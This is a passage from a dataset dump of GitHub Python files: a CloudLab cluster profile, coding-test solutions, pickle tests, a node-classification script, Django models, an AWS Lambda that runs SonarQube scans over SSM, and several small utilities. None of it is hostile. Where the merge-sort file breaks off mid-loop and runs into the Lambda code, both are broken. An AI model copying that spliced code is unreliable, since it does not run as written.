on_account_updates(conn, channel, account):\n print('account', account)\n\n@conn.on(r'^trade_updates$')\nasync def on_trade_updates(conn, channel, trade):\n print('trade', trade)\n\n# updates for every trade / at what price\n@conn.on(r'^T.AAPL$') # updates for every trade / at what price\nasync def trade_info(conn, channel, bar):\n print('bars', bar)\n print(bar._raw)\n\n# return bid/ask\n@conn.on(r'^Q.AAPL$')\nasync def quote_info(conn, channel, bar):\n print('bars', bar)\n\n# 1 min bar\n@conn.on(r'^AM.AAPL$')\nasync def on_minute_bars(conn, channel, bar):\n print('bars', bar)\n\ndef ws_start():\n\tconn.run(['account_updates', 'trade_updates'])\n\n#start WebSocket in a thread\nws_thread = threading.Thread(target=ws_start, daemon=True)\nws_thread.start()\n\n\n\n\n\n\n","repo_name":"nafets33/pollenq","sub_path":"pollen-main/archive/websocket_failed.py","file_name":"websocket_failed.py","file_ext":"py","file_size_in_byte":2810,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"26764659415","text":"#!/usr/bin/env python\n\nkube_description= \\\n\"\"\"\nDevelopment Cluster\n\"\"\"\nkube_instruction= \\\n\"\"\"\nAuthor: Jon Larrea\n\"\"\"\n\n\nimport geni.portal as portal\nimport geni.rspec.pg as PG\nimport geni.rspec.igext as IG\n\n\npc = portal.Context()\nrspec = PG.Request()\n\n\n# Profile parameters.\npc.defineParameter(\"machineNum\", \"Number of Machines\",\n portal.ParameterType.INTEGER, 1)\npc.defineParameter(\"Hardware\", \"Machine Hardware\",\n portal.ParameterType.STRING,\"d430\",[(\"d430\",\"d430\"),(\"d710\",\"d710\"), (\"d820\", \"d820\"), (\"pc3000\", \"pc3000\"), (\"d740\", \"d740\"), (\"d840\", \"d840\")])\npc.defineParameter(\"OS\", \"Operating System\",\n portal.ParameterType.STRING,\"ubuntu18\",[(\"ubuntu18\",\"ubuntu18\"),(\"ubuntu20\",\"ubuntu20\"), (\"ubuntu22\", \"ubuntu22\")])\n\n# Isolated CPU parameters\npc.defineParameter(\"isolcpusNumber\", \"Number of Isolated CPUs\",\n portal.ParameterType.INTEGER, 0,\n advanced=True)\n\n# Kubernetes parameters\npc.defineParameter(\"k8s\", \"Install Kubernetes\",\n portal.ParameterType.BOOLEAN, False,\n advanced=True)\n\n# USRP Node\nusrp_b210_locations = [\n (\"none\",\n \"No USRP\"),\n (\"web\",\n \"WEB\"),\n (\"bookstore\",\n \"Bookstore\"),\n (\"humanities\",\n \"Humanities\"),\n (\"law73\",\n \"Law 73\"),\n (\"ebc\",\n \"EBC\"),\n (\"madsen\",\n \"Madsen\"),\n (\"sagepoint\",\n \"Sage Point\"),\n (\"moran\",\n \"Moran\"),\n (\"cpg\",\n \"Central Parking Garage\"),\n (\"guesthouse\",\n \"Guest House\"),\n]\n\npc.defineParameter(\"usrpb210\", \"USRP B210 Location\",\n portal.ParameterType.STRING, \"none\", usrp_b210_locations, advanced=True)\n\n\nparams = pc.bindParameters()\n\n#\n# Give the library a chance to return nice JSON-formatted exception(s) and/or\n# warnings; this might sys.exit().\n#\npc.verifyParameters()\n\n\n\ntour = IG.Tour()\ntour.Description(IG.Tour.TEXT,kube_description)\ntour.Instructions(IG.Tour.MARKDOWN,kube_instruction)\nrspec.addTour(tour)\n\n\n# Network\nnetmask=\"255.255.255.0\"\nnetwork = rspec.Link(\"Network\")\nnetwork.link_multiplexing = True\nnetwork.vlan_tagging = True\nnetwork.best_effort = True\n\nif params.OS == 'ubuntu20':\n os = 'urn:publicid:IDN+emulab.net+image+emulab-ops:UBUNTU20-64-STD'\nelif params.OS == 'ubuntu22':\n os = 'urn:publicid:IDN+emulab.net+image+emulab-ops//UBUNTU22-64-BETA'\nelse:\n os = 'urn:publicid:IDN+emulab.net+image+emulab-ops:UBUNTU18-64-STD'\n\n# Variable that stores configuration scripts and arguments\nprofileConfigs = \"\"\n\n# Kubernetes configuration\nk8s_ip = 0 # This is to calculate the IPs when K8s is installed\nif params.k8s == True:\n # Declare the master node\n master = rspec.RawPC(\"master\")\n master.hardware_type = params.Hardware\n master.routable_control_ip = True\n master.disk_image = os\n iface = master.addInterface()\n iface.addAddress(PG.IPv4Address(\"192.168.1.1\", netmask))\n network.addInterface(iface)\n master.addService(PG.Execute(shell=\"bash\", command=\"/local/repository/scripts/master.sh\"))\n k8s_ip = 1\n # Configure script for the slave nodes\n profileConfigs += \"PROFILE_CONF_COMMAND_K8S='/local/repository/scripts/slave.sh' \"\n\n# IsolCPU configuration\nif params.isolcpusNumber > 0:\n profileConfigs += \"PROFILE_CONF_COMMAND_ISOLCPU='/local/repository/scripts/isolcpus.sh' \"\n profileConfigs += \"PROFILE_CONF_COMMAND_ISOLCPU_ARGS='%d' \" % (params.isolcpusNumber)\nelse:\n profileConfigs += \"PROFILE_CONF_COMMAND_NOREBOOT='touch' \"\n profileConfigs += \"PROFILE_CONF_COMMAND_NOREBOOT_ARGS='/local/.noreboot' \"\n\n# Machines\nfor i in range(0,params.machineNum):\n node = rspec.RawPC(\"node\" + str(i))\n node.disk_image = os\n node.addService(PG.Execute(shell=\"bash\", command=profileConfigs + \"/local/repository/scripts/configure.sh\"))\n node.hardware_type = params.Hardware\n iface = node.addInterface()\n iface.addAddress(PG.IPv4Address(\"192.168.1.\"+str(i+1+k8s_ip), netmask))\n network.addInterface(iface)\n\nif params.usrpb210 != 'none':\n b210_nuc_pair_node = rspec.RawPC(\"b210-%s-%s\"%(params.usrpb210, \"nuc2\"))\n agg_full_name = \"urn:publicid:IDN+%s.powderwireless.net+authority+cm\"%(params.usrpb210)\n b210_nuc_pair_node.component_manager_id = agg_full_name\n b210_nuc_pair_node.component_id = \"nuc2\"\n b210_nuc_pair_node.disk_image = os\n\n#\n# Print and go!\n#\npc.printRequestRSpec(rspec)\n","repo_name":"j0lama/compute-server","sub_path":"profile.py","file_name":"profile.py","file_ext":"py","file_size_in_byte":4345,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"10623637107","text":"# import collections\n# def solution(genres, plays):\n# answer = []\n# #fave = collections.Counter(genres)\n \n# result = [[g, p] for g, p in zip(genres, plays)]\n# #fave = collections.Counter([result[i][0] for i in range(len(result))])\n# print(result)\n \n# genre_dict = collections.defaultdict(int)\n\n# for item in result:\n# genre = item[0]\n# value = item[1]\n# genre_dict[genre] += value\n\n# sum = [[genre, value] for genre, value in genre_dict.items()]\n# print(sum)\n# #return answer\n\n\nfrom collections import defaultdict\n\ndef solution(genres, plays):\n answer = []\n \n genres_order = defaultdict(int)\n genres_plays = defaultdict(list)\n \n for i, (genre, v) in enumerate(zip(genres, plays)):\n genres_order[genre] += v\n genres_plays[genre].append((i, v))\n \n for genre, _ in sorted(genres_order.items(), key = lambda x: x[1], reverse = True):\n for i, v in sorted(genres_plays[genre], key = lambda x: x[1], reverse = True)[:2]:\n answer.append(i)\n \n return answer","repo_name":"examplezi/Programmers","sub_path":"프로그래머스/lv3/42579. 베스트앨범/베스트앨범.py","file_name":"베스트앨범.py","file_ext":"py","file_size_in_byte":1084,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"18983253377","text":"# 문제 설명\n# 정수 n을 입력받아 n의 약수를 모두 더한 값을 리턴하는 함수, solution을 완성해주세요.\n\n# 제한사항\n# n은 0이상 3000이하인 정수입니다.\n\n# 입출력 예\n# n return\n# 12 28\n# 5 6\n\ndef solution(n):\n answer = 0\n aliqout_list = []\n if n > 1:\n for num in range(1, n):\n if n % num == 0:\n aliqout_list.append(n // num)\n aliqout_list.append(num)\n answer = sum(set(aliqout_list))\n elif n == 1:\n answer = 1\n else:\n answer = 0\n return answer \n\ndef init():\n n = int(input())\n print(solution(n))\n\ninit()","repo_name":"kkojae91/algorithm_prac","sub_path":"python_algorithm/programmers/약수의합.py","file_name":"약수의합.py","file_ext":"py","file_size_in_byte":606,"program_lang":"python","lang":"ko","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23669730958","text":"import unittest\n\n# Enthought library imports\nimport enthought.sweet_pickle as sweet_pickle\nfrom enthought.sweet_pickle.global_registry import _clear_global_registry\n\n\n##############################################################################\n# Classes to use within the tests\n##############################################################################\n\n# Need complete package name so that mapping matches correctly.\n# The problem here is the Python loader that will load the same module with\n# multiple names in sys.modules due to relative naming. Nice.\nfrom enthought.sweet_pickle.tests.class_mapping_classes import Foo, Bar, Baz\n\n##############################################################################\n# class 'ClassMappingTestCase'\n##############################################################################\n\nclass ClassMappingTestCase(unittest.TestCase):\n \"\"\" Tests the class mapping functionality of the enthought.sweet_pickle\n framework.\n \"\"\"\n\n ##########################################################################\n # 'TestCase' interface\n ##########################################################################\n\n ### public interface #####################################################\n\n def setUp(self):\n \"\"\" Creates the test fixture.\n\n Overridden here to ensure each test starts with an empty global\n registry.\n \"\"\"\n # Clear the global registry\n _clear_global_registry()\n\n # Cache a reference to the new global registry\n self.registry = sweet_pickle.get_global_registry()\n\n\n ##########################################################################\n # 'ClassMappingTestCase' interface\n ##########################################################################\n\n ### public interface #####################################################\n\n def test_infinite_loop_detection(self):\n \"\"\" Validates that the class mapping framework detects infinite\n loops of class mappings.\n \"\"\"\n # Add mappings to the registry\n self.registry.add_mapping_to_class(Foo.__module__, Foo.__name__,\n Bar)\n self.registry.add_mapping_to_class(Bar.__module__, Bar.__name__,\n Baz)\n self.registry.add_mapping_to_class(Baz.__module__, Baz.__name__,\n Foo)\n\n # Validate that an exception is raised when trying to unpickle an\n # instance anywhere within the circular definition.\n def fn(o):\n sweet_pickle.loads(sweet_pickle.dumps(o))\n self.assertRaises(sweet_pickle.UnpicklingError, fn, Foo())\n self.assertRaises(sweet_pickle.UnpicklingError, fn, Bar())\n self.assertRaises(sweet_pickle.UnpicklingError, fn, Baz())\n\n\n def test_unpickled_class_mapping(self):\n\n # Add the mappings to the registry\n self.registry.add_mapping_to_class(Foo.__module__, Foo.__name__,\n Bar)\n self.registry.add_mapping_to_class(Bar.__module__, Bar.__name__,\n Baz)\n\n # Validate that unpickling the first class gives us an instance of\n # the third class.\n start = Foo()\n end = sweet_pickle.loads(sweet_pickle.dumps(start))\n self.assertEqual(True, isinstance(end, Baz))\n\n # Validate that unpickling the second class gives us an instance of\n # the third class.\n start = Bar()\n end = sweet_pickle.loads(sweet_pickle.dumps(start))\n self.assertEqual(True, isinstance(end, Baz))\n\n\nif __name__ == \"__main__\":\n unittest.main()\n\n\n### EOF ######################################################################\n","repo_name":"fspaolo/misc-code","sub_path":"maps/build/AppTools/enthought/sweet_pickle/tests/class_mapping_test_case.py","file_name":"class_mapping_test_case.py","file_ext":"py","file_size_in_byte":3641,"program_lang":"python","lang":"en","doc_type":"code","stars":7,"dataset":"github-code","pt":"53"} +{"seq_id":"38933342408","text":"#!/usr/bin/python3.6\n# -*- coding: utf-8 -*-\n# @Author : 张晓辉\n# @Email : husterzxh@foxmail.com\n# @GitHub : https://github.com/husterzxh\n# @Blog : https://www.cnblogs.com/husterzxh/\n# @Time : 2019/7/20 19:07\n# @File : NodeClassification.py\n# @Software : PyCharm\n# 对embedding的结果进行节点分类\nimport numpy\nfrom sklearn.linear_model import LogisticRegression\nfrom sklearn.metrics import f1_score\nfrom sklearn.multiclass import OneVsRestClassifier\nfrom sklearn.preprocessing import MultiLabelBinarizer\n\n\nclass TopKRanker(OneVsRestClassifier):\n def predict(self, X, top_k_list):\n probs = numpy.asarray(super(TopKRanker, self).predict_proba(X))\n all_labels = []\n for i, k in enumerate(top_k_list):\n probs_ = probs[i, :]\n labels = self.classes_[probs_.argsort()[-k:]].tolist()\n probs_[:] = 0\n probs_[labels] = 1\n all_labels.append(probs_)\n return numpy.asarray(all_labels)\n\n\nclass Classifier(object):\n def __init__(self, train_embeddings, test_embeddings, clf):\n self.train_embeddings = train_embeddings\n self.test_embeddings = test_embeddings\n self.clf = TopKRanker(clf)\n self.binarizer = MultiLabelBinarizer(sparse_output=True)\n\n def train(self, Y_all):\n self.binarizer.fit(Y_all)\n X_train = []\n Y_train = []\n for node, embeddings in self.train_embeddings.items():\n X_train.append(embeddings)\n Y_train.append(Y_all[int(node)])\n Y = self.binarizer.transform(Y_train)\n self.clf.fit(X_train, Y)\n\n def evaluate(self, Y):\n list_test_embedding = []\n Y_test = []\n for node, embeddings in self.test_embeddings.items():\n list_test_embedding.append(embeddings)\n Y_test.append(Y[int(node)])\n\n top_k_list = [len(l) for l in Y_test]\n Y_ = self.predict(top_k_list)\n Y_test = self.binarizer.transform(Y_test)\n averages = [\"micro\", \"macro\"]\n results = {}\n for average in averages:\n results[average] = f1_score(Y_test, Y_, average=average)\n return results\n\n def predict(self, top_k_list):\n list_test_embedding = []\n for node, embeddings in self.test_embeddings.items():\n list_test_embedding.append(embeddings)\n X_ = numpy.asarray(list_test_embedding)\n Y = self.clf.predict(X_, top_k_list=top_k_list)\n return Y\n\n def split_train_evaluate(self, Y, seed=0):\n state = numpy.random.get_state()\n numpy.random.seed(seed)\n\n self.train(Y)\n numpy.random.set_state(state)\n return self.evaluate(Y)\n\n\ndef read_node_label(filename, skip_head=False):\n fin = open(filename, 'r')\n X = []\n Y = []\n if skip_head:\n fin.readline()\n while 1:\n l = fin.readline()\n if l == '':\n break\n vec = l.strip().split(' ')\n X.append(vec[0])\n Y.append(vec[1:])\n fin.close()\n return X, Y\n\n\ndef evaluate_embeddings(train_embeddings, test_embeddings):\n X, Y = read_node_label('./data/cora/cora_labels.txt')\n str_result = ''\n clf = Classifier(train_embeddings=train_embeddings, test_embeddings=test_embeddings, clf=LogisticRegression())\n str_result = str_result + str(clf.split_train_evaluate(Y)) + '\\n'\n return str_result\n\nif __name__ == '__main__':\n for i in range(1, 10):\n int_all_round = 2\n float_ratio = round(i * 0.1, 1)\n\n # 读取train结果数据\n file_train_embedding_result = r'./data/' + str(float_ratio) + '/train_node_embedding_' + str(int_all_round) \\\n + '_' + str(float_ratio) + '.embedding'\n with open(file_train_embedding_result, 'r', encoding='utf-8') as fp1:\n list_train_embedding = fp1.read().split('\\n')\n del list_train_embedding[-1]\n dict_train_node_embedding = dict()\n for item_train_embedding in list_train_embedding:\n list_train_node_embedding = item_train_embedding.split(' ')\n str_key = list_train_node_embedding[0]\n list_value = list_train_node_embedding[1:]\n list_value = [float(i) for i in list_value]\n dict_train_node_embedding[str_key] = list_value\n\n # 读取test结果数据\n file_test_embedding_result = r'./data/' + str(float_ratio) + '/test_node_embedding_' + str(int_all_round) \\\n + '_' + str(float_ratio) + '.embedding'\n with open(file_test_embedding_result, 'r', encoding='utf-8') as fp1:\n list_test_embedding = fp1.read().split('\\n')\n del list_test_embedding[-1]\n dict_test_node_embedding = dict()\n for item_test_embedding in list_test_embedding:\n list_test_node_embedding = item_test_embedding.split(' ')\n str_key = list_test_node_embedding[0]\n list_value = list_test_node_embedding[1:]\n list_value = [float(i) for i in list_value]\n dict_test_node_embedding[str_key] = list_value\n\n str_result_f1 = str(float_ratio) + ' ' + evaluate_embeddings(dict_train_node_embedding, dict_test_node_embedding)\n file_result = r'./data/classification_f1.txt'\n with open(file_result, 'a', encoding='utf-8') as fp2:\n fp2.write(str_result_f1)\n print(str_result_f1)\n\n\n\n","repo_name":"husterzxh/StreamNode2Vec","sub_path":"NodeClassification.py","file_name":"NodeClassification.py","file_ext":"py","file_size_in_byte":5375,"program_lang":"python","lang":"en","doc_type":"code","stars":6,"dataset":"github-code","pt":"53"} +{"seq_id":"70020588008","text":"from django.db import models\nfrom django.contrib.auth.models import AbstractUser\nfrom imagekit.models import ProcessedImageField\nfrom imagekit.processors import Thumbnail\nfrom django.conf import settings\n\n# Create your models here.\nclass User(AbstractUser):\n followings = models.ManyToManyField(\n \"self\", symmetrical=False, related_name=\"followers\"\n )\n image = ProcessedImageField(\n upload_to=\"images/\",\n blank=True,\n processors=[Thumbnail(60, 60)],\n format=\"JPEG\",\n options={\"quality\": 90},\n )\n\n @property\n def full_name(self):\n return f\"{self.last_name}{self.first_name}\"\n\n\nclass Profile(models.Model):\n\n user = models.ForeignKey(\n settings.AUTH_USER_MODEL, on_delete=models.CASCADE, related_name=\"user_pk\"\n )\n image = ProcessedImageField(\n blank=True,\n processors=[Thumbnail(200, 300)],\n format=\"JPEG\",\n options={\"quality\": 50},\n )\n","repo_name":"astroastrum/Django","sub_path":"test_1028/accounts/models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":949,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"75039050408","text":"def mergeSort(list):\n #divide part\n if len(list) > 1: #base case for recursive call\n mid = len(list)//2\n left_list = list[:mid]\n right_list = list[mid:]\n\n mergeSort(left_list)\n mergeSort(right_list)\n\n #merge part\n i, j, k = 0, 0, 0\n\n while i= 7:\n return True\n else:\n return False\n\n# The lambda function requires git layer, checkout template.yml\ndef lambda_handler(event, context):\n # Show info for debuging purpose\n print(event)\n \n # Get owner and repo from event\n repo = event['repo']\n owner = event['owner']\n lambda_status = \"pending\"\n shoud_analysis = shoud_analysis_project(owner=owner, repo=repo)\n\n if shoud_analysis is True:\n # Send Command to ec2 instance\n github_url = f\"https://www.github.com/{owner}/{repo}\"\n ssm_response = ssm.send_command( \n InstanceIds=[ sonarqube_name ], \n DocumentName='AWS-RunShellScript', \n Comment=f'{github_url}: clone source code and scan by sonarqube', \n Parameters={\n \"commands\":[\n \"sodu su -\",\n \"cd /home/download\",\n f\"git clone {github_url}.git\",\n f\"cd {repo}\",\n \"/opt/sonar-scanner/bin/sonar-scanner \\\\\",\n \"-Dsonar.host.url=http://localhost:9000 \\\\\",\n \"-Dsonar.scm.provider=git \\\\\",\n \"-Dsonar.sources=. \\\\\",\n f\"-Dsonar.projectKey={owner}:{repo} \\\\\",\n f\"-Dsonar.login={sonar_username} \\\\\",\n f\"-Dsonar.password={sonar_password}\",\n \"cd ..\",\n f\"rm -rf {repo}\"\n ]\n }\n )\n \n time.sleep(3)\n \n # Get run command status\n ssm_command_id = ssm_response['Command']['CommandId']\n ssm_output = ssm.get_command_invocation(\n CommandId=ssm_command_id,\n InstanceId=sonarqube_name,\n )\n \n # Waiting command to be finished\n while (ssm_output[\"Status\"] == \"InProgress\"):\n ssm_output = ssm.get_command_invocation(\n CommandId=ssm_command_id,\n InstanceId=sonarqube_name,\n )\n \n print(ssm_output[\"Status\"])\n time.sleep(2)\n\n # Map last status and sent to queue\n print('SSM Status:', ssm_output[\"Status\"])\n status_switcher = {\n \"Pending\": \"pending\",\n \"Delayed\": \"delayed\",\n \"Success\": \"completed\",\n \"Cancelled\": \"cancelled\",\n \"TimedOut\": \"timed-out\",\n \"Failed\": \"failed\"\n }\n\n lambda_status = status_switcher.get(\n ssm_output[\"Status\"], 'failed')\n else:\n lambda_status = \"completed\"\n\n # Add queue to inform completion\n sqs.send_message(\n QueueUrl=queue_name,\n MessageBody='source_code_status',\n MessageGroupId=repo,\n MessageAttributes={\n 'function_name': {\n 'StringValue': 'get_repo_info',\n 'DataType': 'String'\n },\n 'owner': {\n 'StringValue': owner,\n 'DataType': 'String'\n },\n 'repo': {\n 'StringValue': repo,\n 'DataType': 'String'\n },\n 'status': {\n 'StringValue': lambda_status,\n 'DataType': 'String'\n }\n }\n )\n\n return respond(None, \"OK\")","repo_name":"gomstory/oss-aqm","sub_path":"sam-api/functions/get_source_code/handler.py","file_name":"handler.py","file_ext":"py","file_size_in_byte":5144,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"41462555728","text":"from discord.ext import commands\nimport aiohttp, asyncio\nfrom random import choice\n\nclass Pokemon(commands.Cog):\n def __init__(self, bot):\n self.bot = bot\n self.website = \"https://www.pokepedia.fr/Liste_des_Pokémon_dans_l'ordre_du_Pokédex_National\"\n \n @commands.command()\n async def pokemon(self, ctx):\n \"\"\"\n This procedure gonna get a image of pokemon ramdomly.\n \"\"\"\n \n async with aiohttp.ClientSession() as session:\n async with session.get(self.website) as r:\n if r.status == 200:\n res = []\n\n html = await r.text()\n code = html.split('\\n')\n\n for i in range(len(code)):\n ligne = code[i].split('\"')\n\n for j in range(len(ligne)):\n if len(ligne) > 2 and not(j + 2 >= len(ligne)) and ligne[j][1:] == ligne[j + 2]:\n res.append(ligne[j])\n \n # The pokemon we choose ramdomly\n which_pokemon = choice(res[12:])\n\n print(which_pokemon)\n\n\n async with session.get('https://www.pokepedia.fr' + which_pokemon) as r:\n if r.status == 200:\n res = []\n\n html = await r.text()\n code = html.split(\"\\n\")\n\n for ligne in code:\n for elmt in ligne.split('\"'):\n if '/image' in elmt and which_pokemon in elmt:\n res.append(elmt)\n \n await ctx.send(res[0])\n\nprint(int(14/13))","repo_name":"Tsurea/PigBoss_Bot","sub_path":"pokemon.py","file_name":"pokemon.py","file_ext":"py","file_size_in_byte":1710,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} +{"seq_id":"9495453903","text":"import os\nimport zlib\nimport zipfile\n\n''' 思路: 创建文件对象 - 读取文件 - 关闭文件 - 压缩 - 获得压缩结果 - 生成新文件 - 写入新文件'''\n\n#创建file对象并打开\nfileObject = open(\"shakespeare.txt\", \"r\")\nprint (\"文件名: \", fileObject.name)\n\nret = fileObject.read()\nfileObject.close()\nret = ret.encode()\nprint(\"压缩前大小:\", len(ret))\n# print(\"压缩前文本内容:\", ret)\n\nres = zlib.compress(ret)\nprint(\"压缩后大小:\", len(res))\nres_content = zlib.decompress(res)\nres_content = res_content.decode()\n# print(\"压缩后:\", res_content)\n\nlogName = \"log.txt\"\nlogging = open(logName, \"a+\")\nlogging.write(res_content)\nlogging.close()\n","repo_name":"pajipaji/cup","sub_path":"CompressedFile.py","file_name":"CompressedFile.py","file_ext":"py","file_size_in_byte":678,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"14427461198","text":"# Original Author: Theresa Schmidt, 2021 \n# Revised: Siyu Tao, 2022\n# Last Edit: 2022/07/06\n\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n\n\n\"\"\"\nCreates CoNLL-U formatted tsv files from our tagger's or parser's output files.\n\n1. tagger prediction2conllu: takes a tagging prediction file (json format) and\n writes a CoNLL-U file with the given columns.\n2. parser prediction2conllu: takes a parsing prediction file (json format) and\n writes a CoNLL-U file with the given columns.\n\nTested with Python 3.7\n\nReferences:\n - Lin et al. (2020).\n A recipe for creating multimodal aligned datasets for sequential tasks.\n In Proceedings of the58th Annual Meeting of the Association for Computational Linguistics, pages 4871–4884, Online.\n Association for Computational Linguistics.\n - CoNLL-U: https://universaldependencies.org/format.html\n\"\"\"\n\nimport argparse\nimport json\nfrom ast import literal_eval\nimport logging\n\n\ndef read_prediction_tokens(pred_file):\n \"\"\"\n Reads in the tokens from the tagger's output file.\n\n Returns: a String list\n \"\"\"\n tokens = []\n with open(pred_file, encoding=\"utf-8\") as f:\n for line in f:\n j = json.loads(line)\n tokens.extend(j[\"words\"])\n return tokens\n\n\ndef read_prediction_tags(pred_file):\n \"\"\"\n Reads in the predicted tags from the tagger's output file. Or the\n tags used as part of the input for the parser.\n Also determines the source of the data, i.e. whether it was\n generated by the tagger or the parser.\n\n Returns: a String list with the predicted tags.\n \"\"\"\n model_type = None\n tags = []\n with open(pred_file, encoding=\"utf-8\") as f:\n for line in f:\n j = json.loads(line)\n try:\n tags.extend(j[\"tags\"])\n model_type = \"tagger\"\n except KeyError:\n tags.extend(j[\"pos\"])\n model_type = \"parser\"\n return tags, model_type\n\n\ndef read_prediction_dependencies(pred_file):\n \"\"\"\n Reads in the predictions from the parser's output file.\n\n Returns: two String list with the predicted heads and dependency names, respectively.\n \"\"\"\n heads = []\n deps = []\n with open(pred_file, encoding=\"utf-8\") as f:\n for line in f:\n j = json.loads(line)\n heads.extend(j[\"predicted_heads\"])\n deps.extend(j[\"predicted_dependencies\"])\n heads = list(map(str, heads))\n return heads, deps\n\ndef taggingcolumns2conllu(outfile, tokens, tags, pos_tags=None, filemode=\"w\"):\n \"\"\"\n Takes tokens and tags and writes them into a tsv file in CoNLL-U format.\n Domain-specific tags are required, POS tags are optional.\n CoNLL-U columns: ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC\n\n All tokens are annotated with HEAD = 0 and DEPREL = root, so the parser's\n dataset reader can read in the file without errors.\n \"\"\"\n\n # double-check input\n if len(tokens) != len(tags):\n raise ValueError(\n \"Will not zip tokens and tags: number of tokens in tokens and \"\n \"number of tags in tags must be the same. Got \",\n len(tokens),\n \"and\",\n len(tags),\n )\n # write file: one token per line\n with open(outfile, filemode, encoding=\"utf-8\") as o:\n if pos_tags:\n for (i, (_token, _pos, _tag)) in enumerate(zip(tokens, pos_tags, tags)):\n # need to start counting from 1 bc 0 is used for None-node\n o.write(\n str(i + 1)\n + \"\\t\"\n + _token\n + \"\\t_\\t\"\n + _pos\n + \"\\t\"\n + _tag\n + \"\\t_\\t0\\troot\\t_\\t_\"\n )\n o.write(\"\\n\")\n o.write(\"\\n\")\n else:\n for (i, (_token, _tag)) in enumerate(zip(tokens, tags)):\n # need to start counting from 1 bc 0 is used for None-node\n o.write(\n str(i + 1)\n + \"\\t\"\n + _token\n + \"\\t_\\t_\\t\"\n + _tag\n + \"\\t_\\t0\\troot\\t_\\t_\"\n )\n o.write(\"\\n\")\n o.write(\"\\n\")\n\n\ndef parsercolumns2conllu(outfile, tokens, tags, heads, deps, pos_tags=None, filemode=\"w\"):\n \"\"\"\n Takes tokens, tags and dependency relations and writes them into a tsv file in CoNLL-U format.\n Domain-specific tags are required, POS tags are optional.\n\n CoNLL-U columns: ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC\n \"\"\"\n # double-check input\n if len(tokens) != len(tags):\n raise ValueError(\n f\"Will not zip tokens, tags, heads and deps: number of tokens \"\n f\"in tokens and number of tags in tags must be the same. \"\n f\"Got {len(tokens)}, {len(tags)}, {len(heads)} and {len(deps)}.\"\n )\n # write file: one token per line\n with open(outfile, filemode, encoding=\"utf-8\") as o:\n if pos_tags:\n for (i, (_token, _pos, _tag, _head, _dep)) in enumerate(\n zip(tokens, pos_tags, tags, heads, deps)\n ):\n # need to start counting from 1 bc 0 is used for None-node\n o.write(\n str(i + 1)\n + \"\\t\"\n + _token\n + \"\\t_\\t\"\n + _pos\n + \"\\t\"\n + _tag\n + \"\\t_\\t\"\n + _head\n + \"\\t\"\n + _dep\n + \"\\t_\\t_\"\n )\n o.write(\"\\n\")\n else:\n for (i, (_token, _tag, _head, _dep)) in enumerate(\n zip(tokens, tags, heads, deps)\n ):\n # need to start counting from 1 bc 0 is used for None-node\n o.write(\n str(i + 1)\n + \"\\t\"\n + _token\n + \"\\t_\\t_\\t\"\n + _tag\n + \"\\t_\\t\"\n + _head\n + \"\\t\"\n + _dep\n + \"\\t_\\t_\"\n )\n o.write(\"\\n\")\n o.write(\"\\n\")\n\ndef execute_tagger2c(args):\n \"\"\"\n Takes a prediction file generated by our tagger (i.e. json file) and writes a tsv file in CoNLL-U format.\n\n CoNLL-U columns: ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC\n Realised columns (all other columns contain dummy values): ID FORM _ (UPOS) XPOS _ _ _ _ _\n \"\"\"\n if args.multi_mode:\n lineflag = False\n with open(args.pred_file, encoding=\"utf-8\") as f:\n for line in f:\n lineflag = True\n j = json.loads(line)\n tokens = j[\"words\"]\n tags = j[\"tags\"]\n taggingcolumns2conllu(args.out, tokens, tags, filemode=\"a\")\n if not lineflag:\n raise IOError(\n \"Empty file\"\n ) # Due to formatting and other errors in Lin et al. (2020)'s data,\n # some recipes do not contain text, leaving us with empty files.\n # Empty files could cause further errors; therefore, we want to delete them from the dataset.\n else:\n tokens = read_prediction_tokens(args.pred_file)\n tags, _ = read_prediction_tags(args.pred_file)\n taggingcolumns2conllu(args.out, tokens, tags)\n\n\ndef execute_parse2c(args):\n \"\"\"\n Takes a prediction file generated by our parser (i.e. json file) and writes a tsv file in CoNLL-U format.\n\n CoNLL-U columns: ID FORM LEMMA UPOS XPOS FEATS HEAD DEPREL DEPS MISC\n Realised columns (all other columns contain dummy values): ID FORM _ (UPOS) XPOS _ HEAD DEPREL DEPS _\n \"\"\"\n if args.multi_mode:\n # WIP - not yet tested\n lineflag = False\n with open(args.pred_file, encoding=\"utf-8\") as f:\n for line in f:\n lineflag = True\n j = json.loads(line)\n tokens = j[\"words\"]\n tags = j[\"pos\"]\n heads = j[\"predicted_heads\"]\n heads = list(map(str, heads))\n deps = j[\"predicted_dependencies\"]\n parsercolumns2conllu(args.out, tokens, tags, heads, deps, filemode=\"a\")\n if not lineflag:\n raise IOError(\n \"Empty file\"\n ) # we want to detect and subsequently delete empty files from the dataset.\n else:\n tokens = read_prediction_tokens(args.pred_file)\n tags, _ = read_prediction_tags(args.pred_file)\n heads, deps = read_prediction_dependencies(args.pred_file)\n parsercolumns2conllu(args.out, tokens, tags, heads, deps)\n\n\nif __name__ == \"__main__\":\n\n # parser for command line arguments\n arg_parser = argparse.ArgumentParser(\n description=\"\"\"Select whether it is tagger or parser output that will be converted to CoNLL-U format.\\n\n 1. tagger json2conllu: takes a tagger prediction file (json format) and writes a \n CoNLL-U file with the given columns.\\n\n 2. parser json2conllu: takes a parser prediction file (json format) and writes a \n 